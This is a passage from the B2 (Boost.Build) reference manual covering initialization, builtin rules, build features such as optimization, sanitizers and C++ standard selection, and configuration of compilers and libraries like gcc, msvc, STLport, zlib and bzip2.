Built-in detection: There are a number of built-in glob patterns to support popular package managers. Currently the supported ones are: Conan (conan): currently supports the b2 generator. 6. Reference 6.1. General information 6.1.1. Initialization Immediately upon starting, the B2 engine (b2) loads the Jam code that implements the build system. To do this, it searches for a file called boost-build.jam, first in the invocation directory, then in its parent and so forth up to the filesystem root, and finally in the directories specified by the environment variable BOOST_BUILD_PATH. On Unix BOOST_BUILD_PATH defaults to /usr/share/boost-build. When found, the file is interpreted, and should specify the build system location by calling the boost-build rule: rule boost-build ( location ? ) If location is a relative path, it is treated as relative to the directory of boost-build.jam. The directory specified by that location and the directories in BOOST_BUILD_PATH are then searched for a file called bootstrap.jam, which is expected to bootstrap the build system. This arrangement allows the build system to work without any command-line or environment variable settings. For example, if the build system files were located in a directory "build-system/" at your project root, you might place a boost-build.jam at the project root containing: boost-build build-system ; In this case, running b2 anywhere in the project tree will automatically find the build system. The default bootstrap.jam, after loading some standard definitions, loads both site-config.jam and user-config.jam. 6.2. Builtin rules check-target-builds This rule allows you to conditionally use different properties depending on whether some metatarget builds, or not. This is similar to the functionality of the configure script in autotools projects. The function signature is: rule check-target-builds ( target message ?
: true-properties * : false-properties * ) This function can only be used when passing requirements or usage requirements to a metatarget rule. For example, to make an application link to a library if it’s available, one can use the following: exe app : app.cpp : [ check-target-builds has_foo "System has foo" : <library>foo : <define>FOO_MISSING=1 ] ; For another example, the alias rule can be used to consolidate configuration choices. glob The glob rule takes a list of include patterns and optional exclude patterns, and returns the files from the project's source directory matching any of the include patterns and not matching any of the exclude patterns. For example: lib tools : [ glob *.cpp : file_to_exclude.cpp bad*.cpp ] ; glob-tree The glob-tree rule is similar to the glob rule except that it operates recursively from the directory of the containing Jamfile. For example: ECHO [ glob-tree *.cpp : .svn ] ; will print the names of all C++ files in your project. The .svn exclude pattern prevents the glob-tree rule from entering administrative directories of the Subversion version control system. project Declares project id and attributes, including project requirements. See the section called “Projects”. use-project Assigns a symbolic project ID to a project at a given path. This rule must be better documented! explicit The explicit rule takes a single parameter, a list of metatarget names, and marks them as explicit, so that they are built only by explicit request. always The always rule also takes a single parameter, a list of metatarget names. The targets produced by the named metatargets will always be considered out of date. Consider this example: exe hello : hello.cpp ; exe bye : bye.cpp ; always hello ; If a build of hello is requested, then it will always be recompiled. Note that if a build of hello is not requested, for example you specify just bye on the command line, hello will not be recompiled. constant Sets a project-wide constant. Takes two parameters, a variable name and a value, and makes the specified variable name accessible in this Jamfile and any child Jamfiles. For example: constant VERSION : 1.34.0 ; path-constant Same as constant except that the value is treated as a path relative to the Jamfile location.
For example, if b2 is invoked in the current directory, and the Jamfile in the helper subdirectory has: path-constant DATA : data/a.txt ; then the variable DATA will be set to helper/data/a.txt, and if b2 is invoked from the helper directory, then the variable DATA will be set to data/a.txt. 6.3. Builtin features This section documents the features that are built-in into B2. For features with a fixed set of values, that set is provided, with the default value listed first. address-model Allowed values: 32, 64. Specifies if 32-bit or 64-bit code should be generated by the compiler. Whether this feature works depends on the used compiler, its version, how the compiler is configured, and the values of the architecture and instruction-set features. Please see the section C++ Compilers for details. address-sanitizer Allowed values: on, norecover. Enables address sanitizer. Value norecover disables recovery for the sanitizer. The feature is optional, thus no sanitizer is enabled by default. allow This feature is used to allow specific generators to run. For example, Qt tools can only be invoked when the Qt library is used. In that case, <allow>qt will be in the usage requirements of the library. architecture Allowed values: x86, ia64, sparc, power, mips, mips1, mips2, mips3, mips4, mips32, mips32r2, mips64, parisc, arm, s390x. Specifies the general processor family to generate code for. archiveflags The value of this feature is passed without modification to the archiver tool when creating static libraries. asmflags The value of this feature is passed without modification to the assembler. asynch-exceptions Allowed values: off, on. Selects whether there is support for asynchronous EH (e.g. catching SEGVs). build Allowed values: no Used to conditionally disable build of a target. If <build>no is in properties when building a target, build of that target is skipped. Combined with conditional requirements this allows you to skip building some target in configurations where the build is known to fail.
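As a sketch of combining <build>no with a conditional requirement (the target and file names here are hypothetical):

```jam
# Skip building this target entirely in configurations where the build
# is known to fail: whenever the target OS is windows, <build>no is
# added to the properties and the target is silently skipped.
exe posix-tool : posix-tool.cpp : <target-os>windows:<build>no ;
```

On any other target OS the conditional does not fire and the target builds normally.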
cflags; cxxflags; linkflags The value of these features is passed without modification to the corresponding tools: for cflags that is the C compiler, for cxxflags the C++ compiler, and for linkflags the linker. conditional Used to introduce indirect conditional requirements. The value should have the form: @rulename where rulename should be a name of a rule with the following signature: rule rulename ( properties * ) The rule will be called for each target with its properties and should return any additional properties. See also section Requirements for an example. coverage Allowed values: off, on. Enables code instrumentation to generate coverage data during execution. cxxstd Allowed values: 98, 03, 0x, 11, 1y, 14, 1z, 17, 2a, 20, latest. Specifies the version of the C++ Standard Language to build with. All the official versions of the standard since "98" are included. It is also possible to specify the experimental, work in progress, latest version. Some compilers specified intermediate versions for the experimental versions leading up to the released standard version. Those are included following the GNU nomenclature as 0x, 1y, 1z, and 2a. Depending on the compiler, latest would map to one of those. cxxstd-dialect Subfeature of cxxstd. Allowed values: iso, gnu, ms. Indicates if a non-standard dialect should be used. These usually add extensions or platform-specific functionality. Not specifying the dialect will default to 'iso', which will attempt to use ISO C++ Standard conformance to the best of the compiler’s ability. c++abi Selects a specific variant of C++ ABI if the compiler supports several. c++-template-depth Allowed values: Any positive integer. Allows configuring a C++ compiler with the maximal template instantiation depth parameter. Specific toolsets may or may not provide support for this feature depending on whether their compilers provide a corresponding command-line option. debug-symbols Allowed values: on, off. Specifies if produced object files, executables, and libraries should include debug information.
Typically, the value of this feature is implicitly set by the variant feature, but it can be explicitly specified by the user. The most common usage is to build the release variant with debugging information. define Specifies a preprocessor symbol that should be defined on the command line. You may either specify just the symbol, which will be defined without any value, or both the symbol and the value, separated by an equals sign. def-file Provides a means to specify a .def file for Windows DLLs. dependency Introduces a dependency on the target named by the value of this feature (so it will be brought up-to-date whenever the target being declared is). The dependency is not used in any other way. dll-path Specifies an additional directory where the system should look for shared libraries when the executable or shared library is run. This feature only affects Unix compilers. Please see Why are the dll-path and hardcode-dll-paths properties useful? in Frequently Asked Questions for details. embed-manifest Allowed values: on, off. This feature is specific to the msvc toolset (see Microsoft Visual C++), and controls whether the manifest files should be embedded inside executables and shared libraries, or placed alongside them. This feature corresponds to the IDE option found in the project settings dialog, under Configuration Properties → Manifest Tool → Input and Output → Embed manifest. embed-manifest-file This feature is specific to the msvc toolset (see Microsoft Visual C++), and controls which manifest files should be embedded inside executables and shared libraries. This feature corresponds to the IDE option found in the project settings dialog, under Configuration Properties → Manifest Tool → Input and Output → Additional Manifest Files. embed-manifest-via This feature is specific to the msvc toolset (see Microsoft Visual C++), and controls whether a manifest should be embedded via the linker or the manifest tool. exception-handling Allowed values: on, off. Disables exceptions when set to off.
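For instance, a hypothetical target could use both forms of the define feature described above:

```jam
# <define>NDEBUG defines the symbol without a value;
# <define>APP_VERSION=3 defines it with a value (symbol=value).
exe app : app.cpp : <define>NDEBUG <define>APP_VERSION=3 ;
```

Both defines are passed to the compiler command line for every source of the target.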
extern-c-nothrow Allowed values: off, on. Selects whether all extern "C" functions are considered nothrow by default. fflags The value of this feature is passed without modification to the tool when compiling Fortran sources. file When used in requirements of a prebuilt library target this feature specifies the path to the library file. See Prebuilt targets for examples. find-shared-library Adds a shared library to link to. Usually lib targets should be preferred over using this feature. find-static-library Adds a static library to link to. Usually lib targets should be preferred over using this feature. flags This feature is used for generic, i.e. non-language specific, flags for tools. The value of this feature is passed without modification to the tool that will build the target. hardcode-dll-paths Allowed values: true, false. Controls automatic generation of dll-path properties. Please see the FAQ entry for details. Note that on Mac OSX, the paths are unconditionally hardcoded by the linker, and it is not possible to disable that behavior. implicit-dependency Indicates that the target named by the value of this feature may produce files that are included by the sources of the target being declared. See the section Generated headers for more information. force-include Specifies a file to be included, as if #include "file" appeared as the first line of every source file of the target. The include order is not guaranteed if used multiple times on a single target. include Specifies an additional include path that is to be passed to C and C++ compilers. inlining Allowed values: off, on, full. Enables inlining. install-package Specifies the name of the package to which installed files belong. This is used for the default installation prefix on certain platforms. install-<name> Specifies installation prefix for install targets.
These named installation prefixes are registered by default:
prefix: C:\<package name> if <target-os>windows is in the property set, /usr/local otherwise
exec-prefix: (prefix)
bindir: (exec-prefix)/bin
sbindir: (exec-prefix)/sbin
libexecdir: (exec-prefix)/libexec
libdir: (exec-prefix)/lib
datarootdir: (prefix)/share
datadir: (datarootdir)
sysconfdir: (prefix)/etc
sharedstatedir: (prefix)/com
localstatedir: (prefix)/var
runstatedir: (localstatedir)/run
includedir: (prefix)/include
oldincludedir: /usr/include
docdir: (datarootdir)/doc/<package name>
infodir: (datarootdir)/info
htmldir: (docdir)
dvidir: (docdir)
pdfdir: (docdir)
psdir: (docdir)
lispdir: (datarootdir)/emacs/site-lisp
localedir: (datarootdir)/locale
mandir: (datarootdir)/man
If more are necessary, they can be added with stage.add-install-dir. instruction-set Allowed values: depends on the used toolset. Specifies for which specific instruction set the code should be generated. The code in general might not run on processors with older/different instruction sets. While B2 allows a large set of possible values for this feature, whether a given value works depends on which compiler you use. Please see the section C++ Compilers for details. library This feature is almost equivalent to the <source> feature, except that it takes effect only for linking. library-path Adds to the list of directories which will be used by the linker to search for libraries. leak-sanitizer Allowed values: on, norecover. Enables leak sanitizer. Value norecover disables recovery for the sanitizer. The feature is optional, thus no sanitizer is enabled by default. link Allowed values: shared, static. Controls how libraries are built. local-visibility Allowed values: global, protected, hidden. This feature has the same effect as the visibility feature but is intended to be used by targets that require a particular symbol visibility. Unlike the visibility feature, local-visibility is not inherited by the target dependencies and only affects the target to which it is applied.
The local-visibility feature supports the same values with the same meaning as the visibility feature. By default, if local-visibility is not specified for a target, the value of the visibility feature is used. location Specifies the build directory for a target. The feature is used primarily with the install rule. location-prefix Sets the build directory for a target as the project’s build directory prefixed with the value of this feature. See section Target Paths for an example. mflags The value of this feature is passed without modification to the tool when compiling Objective C sources. mmflags The value of this feature is passed without modification to the tool when compiling Objective C++ sources. name When used in requirements of a prebuilt library target this feature specifies the name of the library (the name of the library file without any platform-specific suffixes or prefixes). See Prebuilt targets for examples. When used in requirements of an install target it specifies the name of the target file. optimization Allowed values: off, speed, space. Enables optimization. speed optimizes for faster code, space optimizes for smaller binary. profiling Allowed values: off, on. Enables generation of extra code to write profile information. relevant Allowed values: the name of any feature. Indicates which other features are relevant for a given target. It is usually not necessary to manage it explicitly, as B2 can deduce it in most cases. Features which are not relevant will not affect target paths, and will not cause conflicts.
A feature will be considered relevant if any of the following are true:
- It is referenced by toolset.flags or toolset.uses-features
- It is used by the requirements of a generator
- It is a sub-feature of a relevant feature
- It has a sub-feature which is relevant
- It is a composite feature, and any composed feature is relevant
- It affects target alternative selection for a main target
- It is a propagated feature and is relevant for any dependency
- It is relevant for any dependency created by the same main target
- It is used in the condition of a conditional property and the corresponding value is relevant
- It is explicitly named as relevant
Relevant features cannot be automatically deduced in the following cases:
- Indirect conditionals. Solution: return properties of the form <relevant>result-feature:<relevant>condition-feature
- Action rules that read properties. Solution: add toolset.uses-features to tell B2 that the feature is actually used.
- Generators and targets that manipulate property-sets directly. Solution: set <relevant> manually.
rtti Allowed values: on, off. Disables run-time type information when set to off. runtime-debugging Allowed values: on, off. Specifies whether produced object files, executables, and libraries should include behavior useful only for debugging, such as asserts. Typically, the value of this feature is implicitly set by the variant feature, but it can be explicitly specified by the user. The most common usage is to build the release variant with debugging output. search When used in requirements of a prebuilt library target this feature adds to the list of directories to search for the library file. See Prebuilt targets for examples. source The <source>X property has the same effect as putting X in the list of sources; it is useful when a source should be added conditionally, see Conditions and alternatives. See also the <library> feature. staging-prefix Specifies staging prefix for install targets. If present, it will be used instead of the path to the named directory prefix.
Example: project : requirements <install-prefix>x/y/z ; install a1 : a : <location>(bindir) ; # installs into x/y/z/bin install a2 : a : <location>(bindir) <staging-prefix>q ; # installs into q/bin The feature is useful when you cannot (or don’t want to) put build artifacts into their intended locations during the build (such as when cross-compiling), but still need to communicate those intended locations to the build system, e.g. to generate configuration files. stdlib Allowed values: native, gnu, gnu11, libc++, sun-stlport, apache. Specifies the C++ standard library to link to and in some cases the library ABI to use: native Use the compiler’s default. gnu Use the GNU Standard Library (a.k.a. libstdc++) with the old ABI. gnu11 Use the GNU Standard Library with the new ABI. libc++ Use LLVM libc++. sun-stlport Use the STLport implementation of the standard library provided with the Solaris Studio compiler. apache Use the Apache stdcxx version 4 C++ standard library provided with the Solaris Studio compiler. strip Allowed values: off, on. Controls whether the binary should be stripped, that is, have everything not necessary to running it removed. suppress-import-lib Suppresses creation of an import library by the linker. tag Used to customize the name of generated files. The value should have the form @rulename, where rulename names a rule that is called for each target with the default name computed by B2, the type of the target, and the property set. The rule can either return a string that must be used as the name of the target, or an empty string, in which case the default name will be used. The most typical use of the tag feature is to encode build properties, or the library version, in the names of library files. target-os Allowed values: aix, android, appletv, bsd, cygwin, darwin, freebsd, haiku, hpux, iphone, linux, netbsd, openbsd, osf, qnx, qnxnto, sgi, solaris, unix, unixware, windows, vms, vxworks, freertos. Specifies the operating system for which the code is to be generated. The compiler you use should be a compiler for that operating system. This option causes B2 to use naming conventions suitable for that operating system, and to adjust the build process accordingly.
For example, with gcc, it controls whether import libraries are produced for shared libraries or not. See the section Cross-compilation for details of cross-compilation. threading Allowed values: single, multi. Controls if the project should be built in multi-threaded mode. This feature does not necessarily change code generation in the compiler, but it causes the compiler to link to additional or different runtime libraries, and define additional preprocessor symbols (for example, _MT on Windows and _REENTRANT on Linux). How those symbols affect the compiled code depends on the code itself. thread-sanitizer Allowed values: on, norecover. Enables thread sanitizer. Value norecover disables recovery for the sanitizer. The feature is optional, thus no sanitizer is enabled by default. toolset Allowed values: any of the toolset modules. Selects the toolset that will be used to build binary targets. The full list of toolset modules is in the Builtin tools section. undef Specifies a preprocessor symbol to undefine. undefined-sanitizer Allowed values: on, norecover. Enables undefined behavior sanitizer. Value norecover disables recovery for the sanitizer. The feature is optional, thus no sanitizer is enabled by default. use Introduces a dependency on the target named by the value of this feature (so it will be brought up-to-date whenever the target being declared is), and adds its usage requirements to the build properties of the target being declared. The dependency is not used in any other way. The primary use case is when you want the usage requirements (such as #include paths) of some library to be applied, but do not want to link to it. user-interface Allowed values: console, gui, wince, native, auto. Specifies the environment for the executable, which affects the entry point symbol (or entry point function) that the linker will select. This feature is Windows-specific. console console application.
gui application that does not require a console (it is supposed to create its own windows). wince application intended to run on a device that has a version of the Windows CE kernel. native application that runs without a subsystem environment. auto application that runs in the POSIX subsystem in Windows. variant Allowed values: debug, release, profile. A feature combining several low-level features, making it easy to request common build configurations. The value debug expands to <optimization>off <debug-symbols>on <inlining>off <runtime-debugging>on The value release expands to <optimization>speed <debug-symbols>off <inlining>full <runtime-debugging>off The value profile expands to the same as release, plus: <profiling>on <debug-symbols>on Users can define their own build variants using the variant rule from the common module. vectorize Allowed values: off, on, full. Enables vectorization. version This feature isn’t used by any of the builtin tools, but can be used, for example, to adjust the target’s name via the tag feature. visibility Allowed values: global, protected, hidden. Specifies the default symbol visibility in compiled binaries. Not all values are supported on all platforms, and on some platforms (for example, Windows) symbol visibility is not supported at all. The supported values have the following meaning: global a.k.a. "default" in gcc documentation. Global symbols are considered public, they are exported from shared libraries and can be redefined by another shared library or executable. protected a.k.a. "symbolic". Protected symbols are exported from shared libraries but cannot be redefined by another shared library or executable. This mode is not supported on some platforms, for example OS X. hidden Hidden symbols are not exported from shared libraries and cannot be redefined by a different shared library or executable loaded in a process. In this mode, public symbols have to be explicitly marked in the source code to be exported from shared libraries.
This is the recommended mode. By default, the compiler’s default visibility mode is used (no compiler flags are added). warnings Allowed values: on, all, extra, pedantic, off. Controls the warning level of compilers. on enable default/"reasonable" warning level. all enable most warnings. extra enable extra, possibly conflicting, warnings. pedantic enable likely inconsequential, and conflicting, warnings. off disable all warnings. Default value is all. warnings-as-errors Allowed values: off, on. Makes it possible to treat warnings as errors and abort compilation on a warning. translate-path Used to introduce custom path feature translation. The value should have the form: @rulename where rulename should be a name of a rule with the following signature: rule rulename ( feature value : properties * : project-id : project-location ) The rule is called for each target with the feature of a path property, the path property value, the target properties, the target project ID, and the target project location. It should return the translated path value, or return nothing if it does not do path translation, leaving the default path translation to take place. lto Allowed values: on. Enables link time optimizations (also known as interprocedural optimizations or whole-program optimizations). Currently supported toolsets are GNU C++, clang, and Microsoft Visual C++. The feature is optional. lto-mode Subfeature of lto. Allowed values: full, thin, fat. Specifies the type of LTO to use. full Use monolithic LTO: on linking, all input is merged into a single module. thin Use clang’s ThinLTO: each compiled file contains a summary of the module; these summaries are merged into a single index. This avoids merging all modules together, which greatly reduces linking time. fat Produce gcc’s fat LTO objects: compiled files contain both the intermediate language suitable for LTO and object code suitable for regular linking. response-file Allowed values: auto, file, contents.
Controls whether a response file is used, or not, during the build of the applicable target.
For file, a response file is created and the filename is substituted in the action.
For contents, the contents ( :E= ) is substituted in the action and no response file is created.
For auto, either a response file is created or the contents are substituted, based on the length of the contents: if the contents fit within the limits of the command line length, the contents are substituted; otherwise a response file is created and the filename is substituted in the actions.
Supported for the clang-linux and msvc toolsets.
6.4. Builtin tools
B2 comes with support for a large number of C++ compilers, and other tools. This section documents how to use those tools.
Before using any tool, you must declare your intention, and possibly specify additional information about the tool’s configuration. This is done by calling the using rule, typically in your user-config.jam, for example:
using gcc ;
Additional parameters can be passed just like for other rules, for example:
using gcc : 4.0 : g++-4.0 ;
The options that can be passed to each tool are documented in the subsequent sections.
6.4.1. C++ Compilers
This section lists all B2 modules that support C++ compilers and documents how each one can be initialized. The name of the support module for a compiler is also the value for the toolset feature that can be used to explicitly request that compiler.
HP aC++ compiler
The acc module supports the HP aC++ compiler for the HP-UX operating system. The module is initialized using the following syntax:
using acc : [version] : [c++-compile-command] : [compiler options] ;
This statement may be repeated several times, if you want to configure several versions of the compiler.
If the command is not specified, the aCC binary will be searched for.
Borland C++ Compiler
The borland module supports the 32-bit command line C++ compilers running on Microsoft Windows.
This is the bcc32 executable for all versions of Borland C++ and C++Builder, as well as the command line compatible compiler bcc32c on later versions of C++Builder.
The module is initialized using the following syntax:
using borland : [version] : [c++-compile-command] : [compiler options] ;
This statement may be repeated several times, if you want to configure several versions of the compiler.
If the command is not specified, Boost.Build will search for a binary named bcc32.
user-interface
Specifies the user interface for applications. Valid choices are console for a console application and gui for a Windows application.
Comeau C/C++ Compiler
The como-linux and como-win modules support the Comeau C/C++ Compiler on Linux and Windows respectively.
The module is initialized using the following syntax:
using como : [version] : [c++-compile-command] : [compiler options] ;
This statement may be repeated several times, if you want to configure several versions of the compiler.
If the command is not specified, B2 will search for a binary named como.
Before using the Windows version of the compiler, you need to set up the necessary environment variables per the compiler’s documentation. In particular, the COMO_XXX_INCLUDE variable should be set, where XXX corresponds to the used backend C compiler.
Code Warrior
The cw module supports the CodeWarrior compiler, originally produced by Metrowerks and presently developed by Freescale. B2 supports only the versions of the compiler that target x86 processors. All such versions were released by Metrowerks before the acquisition and are not sold any longer. The last version known to work is 9.4.
The module is initialized using the following syntax:
using cw : [version] : [c++-compile-command] : [compiler options] ;
This statement may be repeated several times, if you want to configure several versions of the compiler.
If the command is not specified, B2 will search for a binary named mwcc in default installation paths and in PATH.
setup
The command that sets up environment variables prior to invoking the compiler. If not specified, cwenv.bat alongside the compiler binary will be used.
compiler
The command that compiles C and C++ sources. If not specified, mwcc will be used. The command will be invoked after the setup script has been executed and has adjusted the PATH variable.
linker
The command that links executables and dynamic libraries. If not specified, mwld will be used. The command will be invoked after the setup script has been executed and has adjusted the PATH variable.
Digital Mars C/C++ Compiler
The dmc module supports the Digital Mars C++ compiler.
The module is initialized using the following syntax:
using dmc : [version] : [c++-compile-command] : [compiler options] ;
This statement may be repeated several times, if you want to configure several versions of the compiler.
If the command is not specified, B2 will search for a binary named dmc.
GNU C++
The gcc module supports the GNU C++ compiler on Linux, a number of Unix-like systems including SunOS, and on Windows (either Cygwin or MinGW). The gcc module is initialized using the following syntax:
using gcc : [version] : [c++-compile-command] : [compiler options] ;
This statement may be repeated several times, if you want to configure several versions of the compiler.
If the version is not explicitly specified, it will be automatically detected by running the compiler with the -v option. If the command is not specified, the g++ binary will be searched for in PATH.
The following options can be provided, using <option-name>option-value syntax:
asmflags
Specifies additional compiler flags that will be used when compiling assembler sources.
cflags
Specifies additional compiler flags that will be used when compiling C sources.
cxxflags
Specifies additional compiler flags that will be used when compiling C++ sources.
fflags
Specifies additional compiler flags that will be used when compiling Fortran sources.
mflags
Specifies additional compiler flags that will be used when compiling Objective-C sources.
mmflags
Specifies additional compiler flags that will be used when compiling Objective-C++ sources.
compileflags
Specifies additional compiler flags that will be used when compiling sources in any language.
linkflags
Specifies additional command line options that will be passed to the linker.
root
Specifies the root directory of the compiler installation. This option is necessary only if it is not possible to detect this information from the compiler command, for example if the specified compiler command is a user script.
archiver
Specifies the archiver command that is used to produce static libraries. Normally, it is autodetected using gcc’s -print-prog-name option or defaults to ar, but in some cases you might want to override it, for example to explicitly use a system version instead of one included with gcc.
rc
Specifies the resource compiler command that will be used with the version of gcc that is being configured. This setting makes sense only for Windows and only if you plan to use resource files. By default windres will be used.
rc-type
Specifies the type of resource compiler. The value can be either windres for the msvc resource compiler, or rc for borland’s resource compiler.
In order to compile 64-bit applications, you have to specify address-model=64, and the instruction-set feature should refer to a 64-bit processor. Currently, those include nocona, opteron, athlon64 and athlon-fx.
HP C++ Compiler for Tru64 Unix
The hp_cxx module supports the HP C++ Compiler for Tru64 Unix.
The module is initialized using the following syntax:
using hp_cxx : [version] : [c++-compile-command] : [compiler options] ;
This statement may be repeated several times, if you want to configure several versions of the compiler.
If the command is not specified, B2 will search for a binary named hp_cxx.
Intel C++
The intel-* modules support the Intel C++ command-line compiler.
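Combining several of these options, an illustrative user-config.jam entry might look as follows. The version number, command and flag values are examples only, not recommendations:

using gcc : 12 : g++-12 :
    <cxxflags>-std=c++20          # extra flags for C++ sources
    <linkflags>-Wl,--as-needed    # extra options passed to the linker
    <archiver>ar ;                # explicitly chosen archiver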
The module is initialized using the following syntax:
using intel : [version] : [c++-compile-command] : [compiler options] ;
This statement may be repeated several times, if you want to configure several versions of the compiler.
If the compiler command is not specified, then B2 will look in PATH for an executable icpc (on Linux), or icl.exe (on Windows).
root
For the Linux version, specifies the root directory of the compiler installation. This option is necessary only if it is not possible to detect this information from the compiler command, for example if the specified compiler command is a user script.
For the Windows version, specifies the directory of the iclvars.bat file, for versions prior to 21 (or 2021), or of setvars.bat, for versions from 21 (or 2021) onwards, for configuring the compiler. Specifying the root option without specifying the compiler command allows the end-user not to have to worry about whether they are compiling 32-bit or 64-bit code, as the toolset will automatically configure the compiler for the appropriate address model and compiler command using the iclvars.bat or setvars.bat batch file.
Microsoft Visual C++
The msvc module supports the Microsoft Visual C++ command-line tools on Microsoft Windows.
The supported products and versions of command line tools are listed below:
Visual Studio 2019—14.2
Visual Studio 2017—14.1
Visual Studio 2015—14.0
Visual Studio 2013—12.0
Visual Studio 2012—11.0
Visual Studio 2010—10.0
Visual Studio 2008—9.0
Visual Studio 2005—8.0
Visual Studio .NET 2003—7.1
Visual Studio .NET—7.0
Visual Studio 6.0, Service Pack 5—6.5
The user would then call the b2 executable with the toolset set equal to msvc-[version number]; for example, to build with Visual Studio 2019 one could run:
.\b2 toolset=msvc-14.2 target
The msvc module is initialized using the following syntax:
using msvc : [version] : [c++-compile-command] : [compiler options] ;
This statement may be repeated several times, if you want to configure several versions of the compiler.
If the version is not explicitly specified, the most recent version found in the registry will be used instead. If the special value all is passed as the version, all versions found in the registry will be configured. If a version is specified, but the command is not, the compiler binary will be searched for in standard installation paths for that version, followed by PATH.
The compiler command should be specified using forward slashes, and quoted.
assembler
The command that compiles assembler sources. If not specified, ml will be used. The command will be invoked after the setup script has been executed and has adjusted the PATH variable.
compiler
The command that compiles C and C++ sources. If not specified, cl will be used. The command will be invoked after the setup script has been executed and has adjusted the PATH variable.
compiler-filter
Command through which to pipe the output of running the compiler. For example, to pass the output to STLfilt.
idl-compiler
The command that compiles Microsoft COM interface definition files. If not specified, midl will be used. The command will be invoked after the setup script has been executed and has adjusted the PATH variable.
linker
The command that links executables and dynamic libraries. If not specified, link will be used. The command will be invoked after the setup script has been executed and has adjusted the PATH variable.
mc-compiler
The command that compiles Microsoft message catalog files. If not specified, mc will be used. The command will be invoked after the setup script has been executed and has adjusted the PATH variable.
resource-compiler
The command that compiles resource files. If not specified, rc will be used. The command will be invoked after the setup script has been executed and has adjusted the PATH variable.
setup
The filename of the global environment setup script to run before invoking any of the tools defined in this toolset. It will not be used in case a target platform specific script has been explicitly specified for the current target platform. The setup script used will be passed the target platform identifier (x86, x86_amd64, x86_ia64, amd64 or ia64) as a parameter. If not specified, a default script is chosen based on the used compiler binary, e.g. vcvars32.bat or vsvars32.bat.
setup-amd64; setup-i386; setup-ia64
The filename of the target platform specific environment setup script to run before invoking any of the tools defined in this toolset. If not specified, the global environment setup script is used.
64-bit support
Starting with version 8.0, Microsoft Visual Studio can generate binaries for 64-bit processors, both 64-bit flavours of x86 (codenamed AMD64/EM64T) and Itanium (codenamed IA64). In addition, compilers that themselves run in 64-bit mode, for better performance, are provided. The complete list of compiler configurations is as follows (we abbreviate AMD64/EM64T to just AMD64):
32-bit x86 host, 32-bit x86 target
32-bit x86 host, 64-bit AMD64 target
32-bit x86 host, 64-bit IA64 target
64-bit AMD64 host, 64-bit AMD64 target
64-bit IA64 host, 64-bit IA64 target
The 32-bit host compilers can always be used, even on 64-bit Windows.
On the contrary, the 64-bit host compilers require both a 64-bit host processor and 64-bit Windows, but can be faster. By default, only the 32-bit host, 32-bit target compiler is installed, and additional compilers need to be installed explicitly. To use 64-bit compilation you should:
Configure your compiler as usual. If you provide a path to the compiler explicitly, provide the path to the 32-bit compiler. If you try to specify the path to any of the 64-bit compilers, configuration will not work.
When compiling, use address-model=64 to generate AMD64 code. To generate IA64 code, use architecture=ia64.
The (AMD64 host, AMD64 target) compiler will be used automatically when you are generating AMD64 code and are running 64-bit Windows on AMD64. The (IA64 host, IA64 target) compiler will never be used, since nobody has an IA64 machine to test.
It is believed that AMD64 and EM64T targets are essentially compatible. The compiler options /favor:AMD64 and /favor:EM64T, which are accepted only by AMD64 targeting compilers, cause the generated code to be tuned to a specific flavor of 64-bit x86. B2 will make use of those options depending on the value of the instruction-set feature.
Windows Runtime support
Starting with version 11.0, Microsoft Visual Studio can produce binaries for Windows Store and Phone in addition to traditional Win32 desktop. To specify which Windows API set to target, use the windows-api feature. Available options are desktop, store, or phone. If not specified, desktop will be used.
When using store or phone, the specified toolset determines what Windows version is targeted.
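The two steps above, as an illustrative configuration plus invocation (the version number is an example):

# user-config.jam: point at the 32-bit compiler, or let it be autodetected;
# the toolset selects the appropriate 64-bit tools itself.
using msvc : 14.0 ;

and then, on the command line:

b2 toolset=msvc-14.0 address-model=64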
The following options are available:
Windows 8.0: toolset=msvc-11.0 windows-api=store
Windows 8.1: toolset=msvc-12.0 windows-api=store
Windows Phone 8.0: toolset=msvc-11.0 windows-api=phone
Windows Phone 8.1: toolset=msvc-12.0 windows-api=phone
For example, use the following to build for Windows Store 8.1 with the ARM architecture:
.\b2 toolset=msvc-12.0 windows-api=store architecture=arm
Sun Studio
The sun module supports the Sun Studio C++ compilers for the Solaris OS.
The module is initialized using the following syntax:
using sun : [version] : [c++-compile-command] : [compiler options] ;
This statement may be repeated several times, if you want to configure several versions of the compiler.
If the command is not specified, B2 will search for a binary named CC in /opt/SUNWspro/bin and in PATH.
When using this compiler on complex C++ code, such as the Boost C++ library, it is recommended to specify the following options when initializing the sun module:
-library=stlport4 -features=tmplife -features=tmplrefstatic
See the Sun C++ Frontend Tales for details.
Starting with Sun Studio 12, you can create 64-bit applications by using the address-model=64 property.
IBM Visual Age
The vacpp module supports the IBM Visual Age C++ Compiler, for the AIX operating system. Versions 7.1 and 8.0 are known to work.
The module is initialized using the following syntax:
using vacpp ;
The module does not accept any initialization options. The compiler should be installed in the /usr/vacpp/bin directory.
Later versions of Visual Age are known as XL C/C++. They were not tested with the vacpp module.
6.4.2. Third-party libraries
B2 provides special support for some third-party C++ libraries, documented below.
STLport library
The STLport library is an alternative implementation of the C++ runtime library. B2 supports using that library on the Windows platform. Linux is hampered by different naming of libraries in each STLport version and is not officially supported.
Before using STLport, you need to configure it in user-config.jam using the following syntax:
using stlport : version : header-path : library-path ;
Where version is the version of STLport, for example 5.1.4, header-path is the location where STLport headers can be found, and library-path is the location where STLport libraries can be found. The version should always be provided, and the library path should be provided if you’re using STLport’s implementation of iostreams. Note that STLport 5.* always uses its own iostream implementation, so the library path is required.
When STLport is configured, you can build with STLport by requesting stdlib=stlport on the command line.
zlib
Provides support for the zlib library. zlib can be configured either to use precompiled binaries or to build the library from source.
zlib can be initialized using the following syntax:
using zlib : version : options : condition : is-default ;
Options for using a prebuilt library:
search
The directory containing the zlib binaries.
name
Overrides the default library name.
include
The directory containing the zlib headers.
If none of these options is specified, then the environment variables ZLIB_LIBRARY_PATH, ZLIB_NAME, and ZLIB_INCLUDE will be used instead.
Options for building zlib from source:
source
The directory containing the zlib source.
Examples:
# Find zlib in the default system location
using zlib ;
# Build zlib from source
using zlib : 1.2.7 : <source>/home/steven/zlib-1.2.7 ;
# Find zlib in /usr/local
using zlib : 1.2.7 : <include>/usr/local/include <search>/usr/local/lib ;
# Build zlib from source for msvc and find
# prebuilt binaries for gcc.
using zlib : 1.2.7 : <source>C:/Devel/src/zlib-1.2.7 : <toolset>msvc ;
using zlib : 1.2.7 : : <toolset>gcc ;
bzip2
Provides support for the bzip2 library. bzip2 can be configured either to use precompiled binaries or to build the library from source.
bzip2 can be initialized using the following syntax:
using bzip2 : version : options : condition : is-default ;
Options for using a prebuilt library:
search
The directory containing the bzip2 binaries.
name
Overrides the default library name.
include
